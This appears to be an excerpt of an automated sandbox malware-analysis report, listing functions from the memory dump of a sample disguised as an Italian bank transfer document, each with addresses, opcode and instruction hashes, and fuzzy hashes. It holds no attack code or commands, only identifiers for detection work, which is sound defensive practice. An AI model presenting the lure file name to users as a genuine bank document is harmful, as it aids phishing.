                                  • Opcode Fuzzy Hash: b34013bd18d1835c6411e241982459dbe4d2b361923e5c95866ee8e4aca75841
                                  • Instruction Fuzzy Hash: 124124B1B00309EBDB2DEF6898C2BAE3775AB95708F00007CEB869B745DBB19841C750
                                  Function 0118A9D3 Relevance: .1, Instructions: 139COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                  • Instruction ID: 93287f6e1f7fdc32464c78f5d886794bfd85803c490cfc37a4f226636be4eba4
                                  • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                  • Instruction Fuzzy Hash: 8F41E5716017169FD72DEF28D880A6AF7A9FF80214B05C62FE95287640EB30EC14CF91
                                  Function 010F01F8 Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14a41267073f8285c66078f4e3d7bc1470a2e06466f943194b44699b3b0eebb3
                                  • Instruction ID: 5dd966cae52c7a1843bdff666c55dd02987fe31018315f1727d7c5e7ca058f04
                                  • Opcode Fuzzy Hash: 14a41267073f8285c66078f4e3d7bc1470a2e06466f943194b44699b3b0eebb3
                                  • Instruction Fuzzy Hash: A741DB35A002199BDB14DF98C841AEEFBB6FF48700F14816EFA85E7A45E7349C01CBA4
                                  Function 010EEBFC Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cb2ccd618f383526609287b7b079f69c1b174c80f474fd57d536125b1f8f5330
                                  • Instruction ID: e6471c0384ae45abcf7a3c9463293a5cdae7c52c56fa90ab50587f0104d181bf
                                  • Opcode Fuzzy Hash: cb2ccd618f383526609287b7b079f69c1b174c80f474fd57d536125b1f8f5330
                                  • Instruction Fuzzy Hash: 0741C37120430A9FD725DF29C884A5BB7F9FF88214F004939E997C7611EB31E855CB51
                                  Function 01102750 Relevance: .1, Instructions: 137COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                  • Instruction ID: 63730596f3cba89ebd6c74d6837000b9fd998189194b510edf3ade2c71a7dde4
                                  • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                  • Instruction Fuzzy Hash: F0516A75A00215CFDB19CF98C480AAEF7B2FF84710F2881A9D955E7355D770AE42CB90
                                  Function 010C6154 Relevance: .1, Instructions: 133COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c7b6ad98e05fe8ccd2de470f94d309ed5620782c54c3d640e8ebb2dfe7b52f4a
                                  • Instruction ID: c1284cc948c98312646fd858139c8f6d0cf15d6f2a58125f47fa55fe33832010
                                  • Opcode Fuzzy Hash: c7b6ad98e05fe8ccd2de470f94d309ed5620782c54c3d640e8ebb2dfe7b52f4a
                                  • Instruction Fuzzy Hash: A051E5B09006169BDB398B28CC40BECBBB2EF15314F1482E9E5A9A73D1DB359991CF40
                                  Function 010C0BCD Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c4973f1baa9bd8149f6622f95bf55eda24f4142df7e03a2a71e26adbbfc0627
                                  • Instruction ID: acf8059aae67f051b1650e22c19311bc23e3083d19f5ccf47d35c27652386bed
                                  • Opcode Fuzzy Hash: 3c4973f1baa9bd8149f6622f95bf55eda24f4142df7e03a2a71e26adbbfc0627
                                  • Instruction Fuzzy Hash: 70417F75A0132CDBDF26DF68C980BEEB7B4AF45B40F4100A9E948AB245D7749E80CF91
                                  Function 010C0D59 Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 911581c574d6e59d80c8a7ec073a018676dedb08f6265407c5f1f81756c7fa47
                                  • Instruction ID: d3a9370098eeb89be1a6c21a0ce7986ff934a18a3c4bbf247b3974e99778d999
                                  • Opcode Fuzzy Hash: 911581c574d6e59d80c8a7ec073a018676dedb08f6265407c5f1f81756c7fa47
                                  • Instruction Fuzzy Hash: 4241C375A40319DFEB25DF29CC80BAEB7A9AB54B04F0004ADF9859B285D7B0ED44CF51
                                  Function 0118866E Relevance: .1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                  • Instruction ID: daddd157d8486d284992a78255ca674315588c97d1516177059c1e28c8b26e3d
                                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                  • Instruction Fuzzy Hash: F841B775B10205ABEB19FF99CD84AAFBBBAAF88744F648069E504D7341D770DD01CB60
                                  Function 010C0887 Relevance: .1, Instructions: 128COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c867c7bd75535207fea656f0463c66d65190fde8d802d1745b2066490bf382f1
                                  • Instruction ID: d1713d999af9b38d77dbdbcb52aff10535c1fc327a9ef9d4f650aed748799712
                                  • Opcode Fuzzy Hash: c867c7bd75535207fea656f0463c66d65190fde8d802d1745b2066490bf382f1
                                  • Instruction Fuzzy Hash: F741C274600702DFE325CF28C880A6AB7F9FF49714B108A6DE58686A54E730E845CF90
                                  Function 010EA470 Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d996a9f5857ef4ae4af5291bbade1176f2694ee18ecbd4390b8dc1ae9648bf16
                                  • Instruction ID: 81fb24b04c1a7ebb2b8a23fdf09f5a43aceb440fc82f7610c3321c08437b1e26
                                  • Opcode Fuzzy Hash: d996a9f5857ef4ae4af5291bbade1176f2694ee18ecbd4390b8dc1ae9648bf16
                                  • Instruction Fuzzy Hash: 0741DD32A01215CFDF29DF6DC898BED7BF0BF58320F1441A9D462AB291DB349940CBA1
                                  Function 010C8BF0 Relevance: .1, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 87d8d9be69360adb27f4d5829c21e0be2ea372295e016a266c44fa14931b206d
                                  • Instruction ID: 77d19fb7ce20f3fa081d3b05d7ed894be53fa12b0d8b4fdf1626e6f7dc1bfe6a
                                  • Opcode Fuzzy Hash: 87d8d9be69360adb27f4d5829c21e0be2ea372295e016a266c44fa14931b206d
                                  • Instruction Fuzzy Hash: DA41F332900216CBDB289F4CC8C0A9EBBB1FB98B14F14C02ED9129B656D735D842CF94
                                  Function 010B8918 Relevance: .1, Instructions: 123COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 954b2627fe524da4bd94dd61167845b013d155df75ac1a26d2d4a9d7e3435f41
                                  • Instruction ID: 06a0770a64bab20386d1d48d860dd9875819ce4c35f161b4d4bb559e7bdb102e
                                  • Opcode Fuzzy Hash: 954b2627fe524da4bd94dd61167845b013d155df75ac1a26d2d4a9d7e3435f41
                                  • Instruction Fuzzy Hash: E9416A315087069ED712DF69C880AABF7E8EF88B54F44492BF980D7260E731DE048B97
                                  Function 010BA020 Relevance: .1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                  • Instruction ID: ac2013c91da1b622c8b36a5147c8ad37fbb83613b76fb5983b7c3ea6ed1a6221
                                  • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                  • Instruction Fuzzy Hash: 9D412931B08213DBDB29DE5884807FEFB71EB50764F15807AF9858B244E7368D80CB92
                                  Function 010C09AD Relevance: .1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6bcadebd5c0b960ecf374cf0a99e889e30667adc01172adeb74adfbe8edd88cd
                                  • Instruction ID: 525b7b4b905876c0ed4a6d9bdd99b11f28c43d3236a71c4c9ea6a2d58d505d36
                                  • Opcode Fuzzy Hash: 6bcadebd5c0b960ecf374cf0a99e889e30667adc01172adeb74adfbe8edd88cd
                                  • Instruction Fuzzy Hash: BA415475600701EFD725CF18C840B6ABBE4EF58B14F248A6EE8898B255E771E942CF90
                                  Function 010F0710 Relevance: .1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                  • Instruction ID: e5ac39a8cde0b61f2643facbc2f3d86d3becced98c273eb70d7aba7d4e068181
                                  • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                  • Instruction Fuzzy Hash: 6A415C75A00705EFDB24CF98C981AAABBF5FF08700B1049ADE696D7656D330EA44CF50
                                  Function 010C262C Relevance: .1, Instructions: 119COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9601e192888acbcb38ff0c42d541551b5cb17f2813c085c78002e3099e5623e5
                                  • Instruction ID: cb40cd13c0cbd32f133ccfa3ebfd27bea502d146ecb06816d10bdd8bdd564da1
                                  • Opcode Fuzzy Hash: 9601e192888acbcb38ff0c42d541551b5cb17f2813c085c78002e3099e5623e5
                                  • Instruction Fuzzy Hash: 7C41BFB1501705CFC72AEF28C980AADB7F1FF58B14F1482ADC4969BAA1DB309941CF51
                                  Function 010FC8F9 Relevance: .1, Instructions: 116COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5fde310f05c510ee84d7e8d2daf702d7755ccdc41bb69ad2e465b0a88ffdf840
                                  • Instruction ID: 5d604c50908903ed0199f10982337347f9e9f449fa7cb49e9b8baed40e9c4937
                                  • Opcode Fuzzy Hash: 5fde310f05c510ee84d7e8d2daf702d7755ccdc41bb69ad2e465b0a88ffdf840
                                  • Instruction Fuzzy Hash: D031BCB2A04349DFEB16CF58C141B99BBF0FB08718F2085AED119EB651D3329902CF90
                                  Function 011407C3 Relevance: .1, Instructions: 114COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec013ff44fab63a9993d5a092fe1f81803f95472f646303c6c3a8c8b830d0443
                                  • Instruction ID: 92ed2f6473372243d7280c8f6fb11a20b07f1284a14c9a2851c33b86e266ba07
                                  • Opcode Fuzzy Hash: ec013ff44fab63a9993d5a092fe1f81803f95472f646303c6c3a8c8b830d0443
                                  • Instruction Fuzzy Hash: 35418E719083019FD764DF29C885B9BBBE8FF88654F004A2EF6A8D7291D7709944CB92
                                  Function 011405A7 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ebdc1e1b9d0cc2631be882f154bbcaaee1f23ccf0c921a2470b2a16cab29cc3f
                                  • Instruction ID: f8d850d57eb22aa111e0d8e5523b475f6719fbe01b6b2705235eef7055c3e469
                                  • Opcode Fuzzy Hash: ebdc1e1b9d0cc2631be882f154bbcaaee1f23ccf0c921a2470b2a16cab29cc3f
                                  • Instruction Fuzzy Hash: AA41E4725047459FC329DF69C840BAAB7E5FFC8B00F14061DFA958B680E730D904C7A6
                                  Function 010C4859 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 69a2818d33fdb7cb7f9e66c244e0070966d83e1533bd1621fed77c83c87692ca
                                  • Instruction ID: 7bf1c97517cbe800bbf5f2c98c90805505c4c0c675ea954c1b4b416b828c429b
                                  • Opcode Fuzzy Hash: 69a2818d33fdb7cb7f9e66c244e0070966d83e1533bd1621fed77c83c87692ca
                                  • Instruction Fuzzy Hash: 7E41CE702003128BD725CF28D8A4BAEBBE9FF90B60F14456DEA95CB291DB30D841CF91
                                  Function 010D02E1 Relevance: .1, Instructions: 106COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                  • Instruction ID: f63bf91014e293a395c3ef75f9eb370ebedec228faa747569c4f58fa9b44c534
                                  • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                  • Instruction Fuzzy Hash: 0F31F231A04345ABDB229B6CCC44BDFBFE9AF54750F0481A9F899D7356CB749884CBA0
                                  Function 010C4260 Relevance: .1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe205ab4cc1f26f9da1f87b4cd8e8c6d81870bf8f1312e9df90f064accd50e8a
                                  • Instruction ID: 47439f9f667c5096efbb93700607d03ffff8b77468f807458f7122cb67870ad9
                                  • Opcode Fuzzy Hash: fe205ab4cc1f26f9da1f87b4cd8e8c6d81870bf8f1312e9df90f064accd50e8a
                                  • Instruction Fuzzy Hash: B341AD71200B459FD72ACF28C891BDA7BE5BB59714F01852EF6998B290D774E810CB50
                                  Function 01160DF0 Relevance: .1, Instructions: 101COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                  • Instruction ID: ae6c46c32f65a240285cc45de59baa649821040ebc5f16cc2e73ec7b7af813fd
                                  • Opcode Fuzzy Hash: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                  • Instruction Fuzzy Hash: BC31E672505325AFD71ADB14CC01EABBBACEB54660F05492DF95187250E771EC14CBA2
                                  Function 0113EB1D Relevance: .1, Instructions: 100COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62cd1489a2f94fac1064c8199035ed1ffa7526024ddac71b8d5cf006a82573ad
                                  • Instruction ID: a3d1da16a51b81bd741cea083c37a48afc289d0510e1bef428599e66e0c06904
                                  • Opcode Fuzzy Hash: 62cd1489a2f94fac1064c8199035ed1ffa7526024ddac71b8d5cf006a82573ad
                                  • Instruction Fuzzy Hash: 5E31B2712027869BF32F575DC948FA57BD8BB80B44F1D00A0AB859B6DADB28D841C625
                                  Function 011861C3 Relevance: .1, Instructions: 97COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0365785ad13340b867b9bdc21f35700e1570eb3a8f6446ea0ed4c30877ec4f35
                                  • Instruction ID: 7bb9e445b0ca5cafd94c96101ea93fb9192668e67e42c1192e1a6194076a5da0
                                  • Opcode Fuzzy Hash: 0365785ad13340b867b9bdc21f35700e1570eb3a8f6446ea0ed4c30877ec4f35
                                  • Instruction Fuzzy Hash: D231A675A0025AEBDB19DF98CC80FAEB7B6FB48744F4581A9E900AB244D770ED41CB94
                                  Function 0116483A Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b783de2f4a5895f994a90b1059678a9e5fd9db86937fc9c7341e98d27a15a4c
                                  • Instruction ID: 496721e3b41c4bfe99826a09494d4a14248c253d6a9564a597cc08bcac3f9551
                                  • Opcode Fuzzy Hash: 8b783de2f4a5895f994a90b1059678a9e5fd9db86937fc9c7341e98d27a15a4c
                                  • Instruction Fuzzy Hash: 89316176A4112DABCF25DF54DC84BDEBBBAAB9C310F1040A5E908A7250DB31DE91CF90
                                  Function 010EEB20 Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a85e88d5a4e35845490d084f02620851f4a7f00a42b7be31e4bb69836f567b29
                                  • Instruction ID: fc42b42f1dbd225f861e8b894d45216f21d44ea2ebd284a50bd8cc899ebd5a50
                                  • Opcode Fuzzy Hash: a85e88d5a4e35845490d084f02620851f4a7f00a42b7be31e4bb69836f567b29
                                  • Instruction Fuzzy Hash: 2831A172E0021DAFDB21DFAACC44AAFBBF9EF48750F114465E956E7250D3709E008BA0
                                  Function 011860B8 Relevance: .1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 68e9ce2e383f4c0c19e82836d5ec149060281a1db666fb826d8973dbbce70baa
                                  • Instruction ID: 97fc947c4558fb999a290ccecbab148e78fdb53406370f35cdb274b7ed3ccf45
                                  • Opcode Fuzzy Hash: 68e9ce2e383f4c0c19e82836d5ec149060281a1db666fb826d8973dbbce70baa
                                  • Instruction Fuzzy Hash: 14310571A00216AFDB1AAF99C880BAEB7B9AF84714F048069E502DB352DB30DC01CF90
                                  Function 010C07AF Relevance: .1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b64c44a6e8bcad95a67fca82cc51b6bd7fe2c8dc73aefc0cc481a3938ccc245
                                  • Instruction ID: 0a564d6fef7368ba6816ef0406c7cf554f948f599aab9fac7619c5776de022b3
                                  • Opcode Fuzzy Hash: 8b64c44a6e8bcad95a67fca82cc51b6bd7fe2c8dc73aefc0cc481a3938ccc245
                                  • Instruction Fuzzy Hash: 0F31C476A04616DBC712DF688880AAFBBE5AF94A50F01852DFDD597214DB30DC05CFE1
                                  Function 010C8550 Relevance: .1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b7bfe50671810207e842883e1587040ba8da6795bde7f768b4abff4ea05f3c5
                                  • Instruction ID: b4fc84ab0d6850e0a52f7fc73d16c981718c8ba0a99a3ccbc9ef812ff43c1830
                                  • Opcode Fuzzy Hash: 2b7bfe50671810207e842883e1587040ba8da6795bde7f768b4abff4ea05f3c5
                                  • Instruction Fuzzy Hash: 6C31C2715043118FE764CF19C840B6ABBE5FF98B00F054A6EF98497350D7B5E844CB95
                                  Function 010FA6C7 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                  • Instruction ID: 55a77b701c60ac93af82688810628e3babc34d57e11a28415c44762940eef010
                                  • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                  • Instruction Fuzzy Hash: C6312AB2B04B01EFD765CF69DD41B57BBF8BB48A50F14096DA69AC3A50E730E900CB60
                                  Function 0116EBD0 Relevance: .1, Instructions: 91COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
